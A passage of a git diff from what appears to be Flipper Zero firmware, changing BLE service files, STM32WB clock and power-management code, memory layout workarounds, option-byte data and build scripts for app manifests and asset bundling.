callback; +- hid_svc->led_state_ctx = context; +-} +- +-bool hid_svc_is_started() { +- return hid_svc != NULL; +-} +- +-void hid_svc_stop() { +- tBleStatus status; +- if(hid_svc) { +- // Delete characteristics +- for(size_t i = 0; i < HidSvcGattCharacteristicCount; i++) { +- flipper_gatt_characteristic_delete(hid_svc->svc_handle, &hid_svc->chars[i]); +- } +- +- typedef struct { +- uint8_t report_count; +- FlipperGattCharacteristicInstance* chars; +- } HidSvcReportCharProps; +- +- HidSvcReportCharProps hid_report_chars[] = { +- {HID_SVC_INPUT_REPORT_COUNT, hid_svc->input_report_chars}, +- {HID_SVC_OUTPUT_REPORT_COUNT, hid_svc->output_report_chars}, +- {HID_SVC_FEATURE_REPORT_COUNT, hid_svc->feature_report_chars}, +- }; +- +- for(size_t report_type_idx = 0; report_type_idx < COUNT_OF(hid_report_chars); +- report_type_idx++) { +- for(size_t report_idx = 0; report_idx < hid_report_chars[report_type_idx].report_count; +- report_idx++) { +- flipper_gatt_characteristic_delete( +- hid_svc->svc_handle, &hid_report_chars[report_type_idx].chars[report_idx]); +- } +- } +- +- // Delete service +- status = aci_gatt_del_service(hid_svc->svc_handle); +- if(status) { +- FURI_LOG_E(TAG, "Failed to delete HID service: %d", status); +- } +- free(hid_svc); +- hid_svc = NULL; +- } +-} +diff --git a/firmware/targets/f7/ble_glue/services/serial_service_uuid.inc b/firmware/targets/f7/ble_glue/services/serial_service_uuid.inc +deleted file mode 100644 +index a297d9ad6..000000000 +--- a/firmware/targets/f7/ble_glue/services/serial_service_uuid.inc ++++ /dev/null +@@ -1,12 +0,0 @@ +- +-static const Service_UUID_t service_uuid = { .Service_UUID_128 = \ +- { 0x00, 0x00, 0xfe, 0x60, 0xcc, 0x7a, 0x48, 0x2a, 0x98, 0x4a, 0x7f, 0x2e, 0xd5, 0xb3, 0xe5, 0x8f }}; +- +-#define SERIAL_SVC_TX_CHAR_UUID \ +- { 0x00, 0x00, 0xfe, 0x61, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +-#define SERIAL_SVC_RX_CHAR_UUID \ +- { 0x00, 0x00, 0xfe, 0x62, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +-#define SERIAL_SVC_FLOW_CONTROL_UUID \ +- { 0x00, 0x00, 0xfe, 0x63, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +-#define SERIAL_SVC_RPC_STATUS_UUID \ +- { 0x00, 0x00, 0xfe, 0x64, 0x8e, 0x22, 0x45, 0x41, 0x9d, 0x4c, 0x21, 0xed, 0xae, 0x82, 0xed, 0x19 } +diff --git a/firmware/targets/f7/ble_glue/tl_dbg_conf.h b/firmware/targets/f7/ble_glue/tl_dbg_conf.h +index daaa9d82b..ce58af32b 100644 +--- a/firmware/targets/f7/ble_glue/tl_dbg_conf.h ++++ b/firmware/targets/f7/ble_glue/tl_dbg_conf.h +@@ -1,12 +1,39 @@ +-#pragma once ++/* USER CODE BEGIN Header */ ++/** ++ ****************************************************************************** ++ * File Name : App/tl_dbg_conf.h ++ * Description : Debug configuration file for stm32wpan transport layer interface. ++ * ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2020 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++/* USER CODE END Header */ + +-#include "app_conf.h" /* required as some configuration used in dbg_trace.h are set there */ +-#include "dbg_trace.h" ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef __TL_DBG_CONF_H ++#define __TL_DBG_CONF_H + + #ifdef __cplusplus + extern "C" { + #endif + ++/* USER CODE BEGIN Tl_Conf */ ++ ++/* Includes ------------------------------------------------------------------*/ ++#include "app_conf.h" /* required as some configuration used in dbg_trace.h are set there */ ++#include "dbg_trace.h" ++#include "hw_if.h" ++ + /** + * Enable or Disable traces + * The raw data output is the hci binary packet format as specified by the BT specification * +@@ -97,6 +124,12 @@ extern "C" { + #define TL_MM_DBG_MSG(...) + #endif + ++/* USER CODE END Tl_Conf */ ++ + #ifdef __cplusplus + } + #endif ++ ++#endif /*__TL_DBG_CONF_H */ ++ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/utilities_conf.h b/firmware/targets/f7/ble_glue/utilities_conf.h +new file mode 100644 +index 000000000..9c15f2263 +--- /dev/null ++++ b/firmware/targets/f7/ble_glue/utilities_conf.h +@@ -0,0 +1,68 @@ ++/* USER CODE BEGIN Header */ ++/** ++ ****************************************************************************** ++ * File Name : utilities_conf.h ++ * Description : Configuration file for STM32 Utilities. ++ * ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2019 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under BSD 3-Clause license, ++ * the "License"; You may not use this file except in compliance with the ++ * License. You may obtain a copy of the License at: ++ * opensource.org/licenses/BSD-3-Clause ++ * ++ ****************************************************************************** ++ */ ++/* USER CODE END Header */ ++ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef UTILITIES_CONF_H ++#define UTILITIES_CONF_H ++ ++#ifdef __cplusplus ++extern "C" { ++#endif ++ ++#include "cmsis_compiler.h" ++#include "string.h" ++#include ++ ++/****************************************************************************** ++ * common ++ ******************************************************************************/ ++#define UTILS_ENTER_CRITICAL_SECTION() FURI_CRITICAL_ENTER() ++ ++#define UTILS_EXIT_CRITICAL_SECTION() FURI_CRITICAL_EXIT() ++ ++#define UTILS_MEMSET8(dest, value, size) memset(dest, value, size); ++ ++/****************************************************************************** ++ * tiny low power manager ++ * (any macro that does not need to be modified can be removed) ++ ******************************************************************************/ ++#define UTIL_LPM_INIT_CRITICAL_SECTION() ++#define UTIL_LPM_ENTER_CRITICAL_SECTION() UTILS_ENTER_CRITICAL_SECTION() ++#define UTIL_LPM_EXIT_CRITICAL_SECTION() UTILS_EXIT_CRITICAL_SECTION() ++ ++/****************************************************************************** ++ * sequencer ++ * (any macro that does not need to be modified can be removed) ++ ******************************************************************************/ ++#define UTIL_SEQ_INIT_CRITICAL_SECTION() ++#define UTIL_SEQ_ENTER_CRITICAL_SECTION() UTILS_ENTER_CRITICAL_SECTION() ++#define UTIL_SEQ_EXIT_CRITICAL_SECTION() UTILS_EXIT_CRITICAL_SECTION() ++#define UTIL_SEQ_CONF_TASK_NBR (32) ++#define UTIL_SEQ_CONF_PRIO_NBR (2) ++#define UTIL_SEQ_MEMSET8(dest, value, size) UTILS_MEMSET8(dest, value, size) ++ ++#ifdef __cplusplus ++} ++#endif ++ ++#endif /*UTILITIES_CONF_H */ ++ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt.c b/firmware/targets/f7/furi_hal/furi_hal_bt.c +index 9defefbfe..ce6e9e291 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_bt.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_bt.c +@@ -2,18 +2,15 @@ + + #include + #include +- + #include +-#include +- +-#include + + #include + #include + #include + #include + #include +-#include ++#include "battery_service.h" ++ + #include + + #define TAG "FuriHalBt" +diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c b/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c +index 2bbfc1523..8e05a9904 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_bt_hid.c +@@ -1,11 +1,11 @@ + #include + #include +-#include +-#include +-#include ++#include "usb_hid.h" ++#include "dev_info_service.h" ++#include "battery_service.h" ++#include "hid_service.h" + + #include +-#include + + #define FURI_HAL_BT_INFO_BASE_USB_SPECIFICATION (0x0101) + #define FURI_HAL_BT_INFO_COUNTRY_CODE (0x00) +@@ -221,7 +221,7 @@ void furi_hal_bt_hid_start() { + FURI_HAL_BT_HID_INFO_FLAG_REMOTE_WAKE_MSK | + FURI_HAL_BT_HID_INFO_FLAG_NORMALLY_CONNECTABLE_MSK, + }; +- hid_svc_update_info(hid_info_val); ++ hid_svc_update_info(hid_info_val, sizeof(hid_info_val)); + } + + void furi_hal_bt_hid_stop() { +diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c b/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c +index 2927d946f..2539e6bd0 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_bt_serial.c +@@ -1,7 +1,7 @@ + #include +-#include +-#include +-#include ++#include "dev_info_service.h" ++#include "battery_service.h" ++#include "serial_service.h" + + #include + +diff --git a/firmware/targets/f7/furi_hal/furi_hal_clock.c b/firmware/targets/f7/furi_hal/furi_hal_clock.c +index 86c8fd467..736ad9f7c 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_clock.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_clock.c +@@ -4,26 +4,19 @@ + + #include + #include +-#include + #include + #include + +-#include +-#include +- + #define TAG "FuriHalClock" + +-#define CPU_CLOCK_EARLY_HZ 4000000 +-#define CPU_CLOCK_HSI16_HZ 16000000 +-#define CPU_CLOCK_HSE_HZ 32000000 +-#define CPU_CLOCK_PLL_HZ 64000000 +- ++#define CPU_CLOCK_HZ_EARLY 4000000 ++#define CPU_CLOCK_HZ_MAIN 64000000 + #define TICK_INT_PRIORITY 15U + #define HS_CLOCK_IS_READY() (LL_RCC_HSE_IsReady() && LL_RCC_HSI_IsReady()) + #define LS_CLOCK_IS_READY() (LL_RCC_LSE_IsReady() && LL_RCC_LSI1_IsReady()) + + void furi_hal_clock_init_early() { +- LL_SetSystemCoreClock(CPU_CLOCK_EARLY_HZ); ++ LL_SetSystemCoreClock(CPU_CLOCK_HZ_EARLY); + LL_Init1msTick(SystemCoreClock); + } + +@@ -31,6 +24,11 @@ void furi_hal_clock_deinit_early() { + } + + void furi_hal_clock_init() { ++ /* Prepare Flash memory for 64MHz system clock */ ++ LL_FLASH_SetLatency(LL_FLASH_LATENCY_3); ++ while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_3) ++ ; ++ + /* HSE and HSI configuration and activation */ + LL_RCC_HSE_SetCapacitorTuning(0x26); + LL_RCC_HSE_Enable(); +@@ -51,6 +49,9 @@ void furi_hal_clock_init() { + while(!LS_CLOCK_IS_READY()) + ; + ++ /* RF wakeup */ ++ LL_RCC_SetRFWKPClockSource(LL_RCC_RFWKP_CLKSOURCE_LSE); ++ + LL_EXTI_EnableIT_0_31( + LL_EXTI_LINE_18); /* Why? Because that's why. See RM0434, Table 61. CPU1 vector table. */ + LL_EXTI_EnableRisingTrig_0_31(LL_EXTI_LINE_18); +@@ -78,17 +79,12 @@ void furi_hal_clock_init() { + ; + + /* Sysclk activation on the main PLL */ +- /* Set CPU1 prescaler */ ++ /* Set CPU1 prescaler*/ + LL_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_1); + +- /* Set CPU2 prescaler, from this point we are not allowed to touch it. */ ++ /* Set CPU2 prescaler*/ + LL_C2_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_2); + +- /* Prepare Flash memory for work on 64MHz system clock */ +- LL_FLASH_SetLatency(LL_FLASH_LATENCY_3); +- while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_3) +- ; +- + LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_PLL); + while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) + ; +@@ -108,7 +104,7 @@ void furi_hal_clock_init() { + ; + + /* Update CMSIS variable (which can be updated also through SystemCoreClockUpdate function) */ +- LL_SetSystemCoreClock(CPU_CLOCK_PLL_HZ); ++ LL_SetSystemCoreClock(CPU_CLOCK_HZ_MAIN); + + /* Update the time base */ + LL_Init1msTick(SystemCoreClock); +@@ -126,7 +122,7 @@ void furi_hal_clock_init() { + FURI_LOG_I(TAG, "Init OK"); + } + +-void furi_hal_clock_switch_hse2hsi() { ++void furi_hal_clock_switch_to_hsi() { + LL_RCC_HSI_Enable(); + + while(!LL_RCC_HSI_IsReady()) +@@ -138,77 +134,46 @@ void furi_hal_clock_switch_hse2hsi() { + while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSI) + ; + ++ LL_C2_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_1); ++ + LL_FLASH_SetLatency(LL_FLASH_LATENCY_0); + while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_0) + ; + } + +-void furi_hal_clock_switch_hsi2hse() { ++void furi_hal_clock_switch_to_pll() { + #ifdef FURI_HAL_CLOCK_TRACK_STARTUP + uint32_t clock_start_time = DWT->CYCCNT; + #endif + + LL_RCC_HSE_Enable(); +- while(!LL_RCC_HSE_IsReady()) +- ; +- +- LL_FLASH_SetLatency(LL_FLASH_LATENCY_1); +- while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_1) +- ; +- +- LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_HSE); +- +- while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSE) +- ; +- +-#ifdef FURI_HAL_CLOCK_TRACK_STARTUP +- uint32_t total = DWT->CYCCNT - clock_start_time; +- if(total > (20 * 0x148)) { +- furi_crash("Slow HSE/PLL startup"); +- } +-#endif +-} +- +-bool furi_hal_clock_switch_hse2pll() { +- furi_assert(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_HSE); +- + LL_RCC_PLL_Enable(); + LL_RCC_PLLSAI1_Enable(); + ++ while(!LL_RCC_HSE_IsReady()) ++ ; + while(!LL_RCC_PLL_IsReady()) + ; + while(!LL_RCC_PLLSAI1_IsReady()) + ; + +- if(SHCI_C2_SetSystemClock(SET_SYSTEM_CLOCK_HSE_TO_PLL) != SHCI_Success) { +- return false; +- } +- +- furi_check(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_PLL); +- +- LL_SetSystemCoreClock(CPU_CLOCK_PLL_HZ); +- SysTick->LOAD = (uint32_t)((SystemCoreClock / 1000) - 1UL); ++ LL_C2_RCC_SetAHBPrescaler(LL_RCC_SYSCLK_DIV_2); + +- return true; +-} ++ LL_FLASH_SetLatency(LL_FLASH_LATENCY_3); ++ while(LL_FLASH_GetLatency() != LL_FLASH_LATENCY_3) ++ ; + +-bool furi_hal_clock_switch_pll2hse() { +- furi_assert(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_PLL); ++ LL_RCC_SetSysClkSource(LL_RCC_SYS_CLKSOURCE_PLL); + +- LL_RCC_HSE_Enable(); +- while(!LL_RCC_HSE_IsReady()) ++ while(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) + ; + +- if(SHCI_C2_SetSystemClock(SET_SYSTEM_CLOCK_PLL_ON_TO_HSE) != SHCI_Success) { +- return false; ++#ifdef FURI_HAL_CLOCK_TRACK_STARTUP ++ uint32_t total = DWT->CYCCNT - clock_start_time; ++ if(total > (20 * 0x148)) { ++ furi_crash("Slow HSE/PLL startup"); + } +- +- furi_check(LL_RCC_GetSysClkSource() == LL_RCC_SYS_CLKSOURCE_STATUS_HSE); +- +- LL_SetSystemCoreClock(CPU_CLOCK_HSE_HZ); +- SysTick->LOAD = (uint32_t)((SystemCoreClock / 1000) - 1UL); +- +- return true; ++#endif + } + + void furi_hal_clock_suspend_tick() { +diff --git a/firmware/targets/f7/furi_hal/furi_hal_clock.h b/firmware/targets/f7/furi_hal/furi_hal_clock.h +index 3100b619f..5e651bbd3 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_clock.h ++++ b/firmware/targets/f7/furi_hal/furi_hal_clock.h +@@ -1,12 +1,11 @@ + #pragma once + +-#include +-#include +- + #ifdef __cplusplus + extern "C" { + #endif + ++#include ++ + typedef enum { + FuriHalClockMcoLse, + FuriHalClockMcoSysclk, +@@ -41,23 +40,11 @@ void furi_hal_clock_deinit_early(); + /** Initialize clocks */ + void furi_hal_clock_init(); + +-/** Switch clock from HSE to HSI */ +-void furi_hal_clock_switch_hse2hsi(); +- +-/** Switch clock from HSI to HSE */ +-void furi_hal_clock_switch_hsi2hse(); +- +-/** Switch clock from HSE to PLL +- * +- * @return true if changed, false if failed or not possible at this moment +- */ +-bool furi_hal_clock_switch_hse2pll(); ++/** Switch to HSI clock */ ++void furi_hal_clock_switch_to_hsi(); + +-/** Switch clock from PLL to HSE +- * +- * @return true if changed, false if failed or not possible at this moment +- */ +-bool furi_hal_clock_switch_pll2hse(); ++/** Switch to PLL clock */ ++void furi_hal_clock_switch_to_pll(); + + /** Stop SysTick counter without resetting */ + void furi_hal_clock_suspend_tick(); +diff --git a/firmware/targets/f7/furi_hal/furi_hal_console.c b/firmware/targets/f7/furi_hal/furi_hal_console.c +index 0b113d2da..2bdc57250 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_console.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_console.c +@@ -5,6 +5,8 @@ + #include + #include + ++#include ++ + #include + + #define TAG "FuriHalConsole" +diff --git a/firmware/targets/f7/furi_hal/furi_hal_flash.c b/firmware/targets/f7/furi_hal/furi_hal_flash.c +index bc65b29eb..796d20b19 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_flash.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_flash.c +@@ -7,9 +7,6 @@ + #include + + #include +-#include +- +-#include + + #define TAG "FuriHalFlash" + +diff --git a/firmware/targets/f7/furi_hal/furi_hal_memory.c b/firmware/targets/f7/furi_hal/furi_hal_memory.c +index 3f8df1f44..7f69b90ca 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_memory.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_memory.c +@@ -4,6 +4,9 @@ + + #define TAG "FuriHalMemory" + ++// STM(TM) Copro(TM) bug(TM) workaround size ++#define RAM2B_COPRO_GAP_SIZE_KB 2 ++ + typedef enum { + SRAM_A, + SRAM_B, +@@ -35,20 +38,13 @@ void furi_hal_memory_init() { + uint32_t sbrsa = (FLASH->SRRVR & FLASH_SRRVR_SBRSA_Msk) >> FLASH_SRRVR_SBRSA_Pos; + uint32_t snbrsa = (FLASH->SRRVR & FLASH_SRRVR_SNBRSA_Msk) >> FLASH_SRRVR_SNBRSA_Pos; + +- // STM(TM) Copro(TM) bug(TM): SNBRSA is incorrect if stack version is higher than 1.13 and lower than 1.17.2+ +- // Radio core started, but not yet ready, so we'll try to guess +- // This will be true only if BLE light radio stack used, +- // 0x0D is known to be incorrect, 0x0B is known to be correct since 1.17.2+ +- // Lower value by 2 pages to match real memory layout +- if(snbrsa > 0x0B) { +- FURI_LOG_E(TAG, "SNBRSA workaround"); +- snbrsa -= 2; +- } +- + uint32_t sram2a_busy_size = (uint32_t)&__sram2a_free__ - (uint32_t)&__sram2a_start__; + uint32_t sram2a_unprotected_size = (sbrsa)*1024; + uint32_t sram2b_unprotected_size = (snbrsa)*1024; + ++ // STM(TM) Copro(TM) bug(TM) workaround ++ sram2b_unprotected_size -= 1024 * RAM2B_COPRO_GAP_SIZE_KB; ++ + memory->region[SRAM_A].start = (uint8_t*)&__sram2a_free__; + memory->region[SRAM_B].start = (uint8_t*)&__sram2b_start__; + +diff --git a/firmware/targets/f7/furi_hal/furi_hal_os.c b/firmware/targets/f7/furi_hal/furi_hal_os.c +index 046cf79dc..3fc1fbea8 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_os.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_os.c +@@ -170,35 +170,27 @@ void vPortSuppressTicksAndSleep(TickType_t expected_idle_ticks) { + return; + } + +- // Core2 shenanigans takes extra time, so we want to compensate tick skew by reducing sleep duration by 1 tick +- TickType_t unexpected_idle_ticks = expected_idle_ticks - 1; +- + // Limit amount of ticks to maximum that timer can count +- if(unexpected_idle_ticks > FURI_HAL_OS_MAX_SLEEP) { +- unexpected_idle_ticks = FURI_HAL_OS_MAX_SLEEP; ++ if(expected_idle_ticks > FURI_HAL_OS_MAX_SLEEP) { ++ expected_idle_ticks = FURI_HAL_OS_MAX_SLEEP; + } + + // Stop IRQ handling, no one should disturb us till we finish + __disable_irq(); +- do { +- // Confirm OS that sleep is still possible +- if(eTaskConfirmSleepModeStatus() == eAbortSleep || furi_hal_os_is_pending_irq()) { +- break; +- } + +- // Sleep and track how much ticks we spent sleeping +- uint32_t completed_ticks = furi_hal_os_sleep(unexpected_idle_ticks); +- // Notify system about time spent in sleep +- if(completed_ticks > 0) { +- if(completed_ticks > expected_idle_ticks) { +-#ifdef FURI_HAL_OS_DEBUG +- furi_hal_console_printf(">%lu\r\n", completed_ticks - expected_idle_ticks); +-#endif +- completed_ticks = expected_idle_ticks; +- } +- vTaskStepTick(completed_ticks); +- } +- } while(0); ++ // Confirm OS that sleep is still possible ++ if(eTaskConfirmSleepModeStatus() == eAbortSleep || furi_hal_os_is_pending_irq()) { ++ __enable_irq(); ++ return; ++ } ++ ++ // Sleep and track how much ticks we spent sleeping ++ uint32_t completed_ticks = furi_hal_os_sleep(expected_idle_ticks); ++ // Notify system about time spent in sleep ++ if(completed_ticks > 0) { ++ vTaskStepTick(MIN(completed_ticks, expected_idle_ticks)); ++ } ++ + // Reenable IRQ + __enable_irq(); + } +diff --git a/firmware/targets/f7/furi_hal/furi_hal_power.c b/firmware/targets/f7/furi_hal/furi_hal_power.c +index c14de8569..035919d78 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_power.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_power.c +@@ -13,7 +13,7 @@ + #include + #include + +-#include ++#include + #include + #include + #include +@@ -162,11 +162,6 @@ static inline void furi_hal_power_resume_aux_periphs() { + static inline void furi_hal_power_deep_sleep() { + furi_hal_power_suspend_aux_periphs(); + +- if(!furi_hal_clock_switch_pll2hse()) { +- // Hello core2 my old friend +- return; +- } +- + while(LL_HSEM_1StepLock(HSEM, CFG_HW_RCC_SEMID)) + ; + +@@ -176,13 +171,13 @@ static inline void furi_hal_power_deep_sleep() { + LL_HSEM_ReleaseLock(HSEM, CFG_HW_ENTRY_STOP_MODE_SEMID, 0); + + // The switch on HSI before entering Stop Mode is required +- furi_hal_clock_switch_hse2hsi(); ++ furi_hal_clock_switch_to_hsi(); + } + } else { + /** + * The switch on HSI before entering Stop Mode is required + */ +- furi_hal_clock_switch_hse2hsi(); ++ furi_hal_clock_switch_to_hsi(); + } + + /* Release RCC semaphore */ +@@ -206,14 +201,12 @@ static inline void furi_hal_power_deep_sleep() { + while(LL_HSEM_1StepLock(HSEM, CFG_HW_RCC_SEMID)) + ; + +- if(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSE) { +- furi_hal_clock_switch_hsi2hse(); ++ if(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) { ++ furi_hal_clock_switch_to_pll(); + } + + LL_HSEM_ReleaseLock(HSEM, CFG_HW_RCC_SEMID, 0); + +- furi_check(furi_hal_clock_switch_hse2pll()); +- + furi_hal_power_resume_aux_periphs(); + furi_hal_rtc_sync_shadow(); + } +diff --git a/firmware/targets/f7/furi_hal/furi_hal_random.c b/firmware/targets/f7/furi_hal/furi_hal_random.c +index 225519303..cf4b552f6 100644 +--- a/firmware/targets/f7/furi_hal/furi_hal_random.c ++++ b/firmware/targets/f7/furi_hal/furi_hal_random.c +@@ -6,7 +6,7 @@ + #include + #include + +-#include ++#include + + #define TAG "FuriHalRandom" + +diff --git a/firmware/targets/furi_hal_include/furi_hal_bt.h b/firmware/targets/furi_hal_include/furi_hal_bt.h +index 25a20c4c3..b7d4eae1a 100644 +--- a/firmware/targets/furi_hal_include/furi_hal_bt.h ++++ b/firmware/targets/furi_hal_include/furi_hal_bt.h +@@ -8,7 +8,7 @@ + #include + #include + #include +-#include ++#include + #include + #include + +diff --git a/firmware/targets/furi_hal_include/furi_hal_bt_serial.h b/firmware/targets/furi_hal_include/furi_hal_bt_serial.h +index 0472d31d1..1b6e79ab0 100644 +--- a/firmware/targets/furi_hal_include/furi_hal_bt_serial.h ++++ b/firmware/targets/furi_hal_include/furi_hal_bt_serial.h +@@ -1,6 +1,6 @@ + #pragma once + +-#include ++#include "serial_service.h" + + #ifdef __cplusplus + extern "C" { +diff --git a/lib/stm32wb.scons b/lib/stm32wb.scons +index 8a8ad9644..94a1c7075 100644 +--- a/lib/stm32wb.scons ++++ b/lib/stm32wb.scons +@@ -64,6 +64,7 @@ sources += [ + "stm32wb_copro/wpan/ble/core/auto/ble_l2cap_aci.c", + "stm32wb_copro/wpan/ble/core/template/osal.c", + "stm32wb_copro/wpan/utilities/dbg_trace.c", ++ "stm32wb_copro/wpan/utilities/otp.c", + "stm32wb_copro/wpan/utilities/stm_list.c", + ] + +diff --git a/lib/stm32wb_copro b/lib/stm32wb_copro +index bbccbefae..6c9c54f05 160000 +--- a/lib/stm32wb_copro ++++ b/lib/stm32wb_copro +@@ -1 +1 @@ +-Subproject commit bbccbefae26a2301b8a4b58e57ebdeb93c08269b ++Subproject commit 6c9c54f05669b2c4d436df58bb691d3b0d7c86df +diff --git a/scripts/ob.data b/scripts/ob.data +index 9f6f1d081..605faccbf 100644 +--- a/scripts/ob.data ++++ b/scripts/ob.data +@@ -14,15 +14,15 @@ IWDGSTOP:0x1:rw + IWDGSW:0x1:rw + IPCCDBA:0x0:rw + ESE:0x1:r +-SFSA:0xD7:r ++SFSA:0xD5:r + FSD:0x0:r + DDS:0x1:r + C2OPT:0x1:r + NBRSD:0x0:r +-SNBRSA:0xB:r ++SNBRSA:0xD:r + BRSD:0x0:r + SBRSA:0x12:r +-SBRV:0x35C00:r ++SBRV:0x35400:r + PCROP1A_STRT:0x1FF:r + PCROP1A_END:0x0:r + PCROP_RDP:0x1:rw +diff --git a/scripts/update.py b/scripts/update.py +index da4a93aee..e6c69d35f 100755 +--- a/scripts/update.py ++++ b/scripts/update.py +@@ -74,9 +74,6 @@ class Main(App): + self.parser_generate.add_argument( + "--I-understand-what-I-am-doing", dest="disclaimer", required=False + ) +- self.parser_generate.add_argument( +- "--stackversion", dest="stack_version", required=False, default="" +- ) + + self.parser_generate.set_defaults(func=self.generate) + +@@ -97,13 +94,6 @@ class Main(App): + if not self.args.radiotype: + raise ValueError("Missing --radiotype") + radio_meta = CoproBinary(self.args.radiobin) +- if self.args.stack_version: +- actual_stack_version_str = f"{radio_meta.img_sig.version_major}.{radio_meta.img_sig.version_minor}.{radio_meta.img_sig.version_sub}" +- if actual_stack_version_str != self.args.stack_version: +- self.logger.error( +- f"Stack version mismatch: expected {self.args.stack_version}, actual {actual_stack_version_str}" +- ) +- return 1 + radio_version = self.copro_version_as_int(radio_meta, self.args.radiotype) + if ( + get_stack_type(self.args.radiotype) not in self.WHITELISTED_STACK_TYPES diff --git a/scripts/fbt/appmanifest.py b/scripts/fbt/appmanifest.py index c999dda29..24076632e 100644 --- a/scripts/fbt/appmanifest.py +++ b/scripts/fbt/appmanifest.py @@ -79,11 +79,19 @@ class FlipperApplication: fap_extbuild: List[ExternallyBuiltFile] = field(default_factory=list) fap_private_libs: List[Library] = field(default_factory=list) fap_file_assets: Optional[str] = None + fal_embedded: bool = False # Internally used by fbt _appmanager: Optional["AppManager"] = None _appdir: Optional[object] = None _apppath: Optional[str] = None _plugins: List["FlipperApplication"] = field(default_factory=list) + _assets_dirs: List[object] = field(default_factory=list) + _section_fapmeta: Optional[object] = None + _section_fapfileassets: Optional[object] = None + + @property + def embeds_plugins(self): + return any(plugin.fal_embedded for plugin in self._plugins) def supports_hardware_target(self, target: str): return target in self.targets or "all" in self.targets @@ -137,6 +145,16 @@ class AppManager: raise FlipperManifestException( f"Plugin {kw.get('appid')} must have 'requires' in manifest" ) + else: + if kw.get("fal_embedded"): + raise FlipperManifestException( + f"App {kw.get('appid')} cannot have fal_embedded set" + ) + # Harmless - cdefines for external apps are meaningless + # if apptype == FlipperAppType.EXTERNAL and kw.get("cdefines"): + # raise FlipperManifestException( + # f"External app {kw.get('appid')} must not have 'cdefines' in manifest" + # ) def load_manifest(self, app_manifest_path: str, app_dir_node: object): if not os.path.exists(app_manifest_path): diff --git a/scripts/fbt/fapassets.py b/scripts/fbt/fapassets.py index 9902fd79a..cd65ad20f 100644 --- a/scripts/fbt/fapassets.py +++ b/scripts/fbt/fapassets.py @@ -1,7 +1,7 @@ import hashlib import os import struct -from typing import TypedDict +from typing import TypedDict, List class File(TypedDict): @@ -32,20 +32,19 @@ class FileBundler: u8[] file_content """ - def __init__(self, directory_path: str): - self.directory_path = directory_path - self.file_list: list[File] = [] - self.directory_list: list[Dir] = [] - self._gather() + def __init__(self, assets_dirs: List[object]): + self.src_dirs = list(assets_dirs) - def _gather(self): - for root, dirs, files in os.walk(self.directory_path): + def _gather(self, directory_path: str): + if not os.path.isdir(directory_path): + raise Exception(f"Assets directory {directory_path} does not exist") + for root, dirs, files in os.walk(directory_path): for file_info in files: file_path = os.path.join(root, file_info) file_size = os.path.getsize(file_path) self.file_list.append( { - "path": os.path.relpath(file_path, self.directory_path), + "path": os.path.relpath(file_path, directory_path), "size": file_size, "content_path": file_path, } @@ -57,15 +56,20 @@ class FileBundler: # os.path.getsize(os.path.join(dir_path, f)) for f in 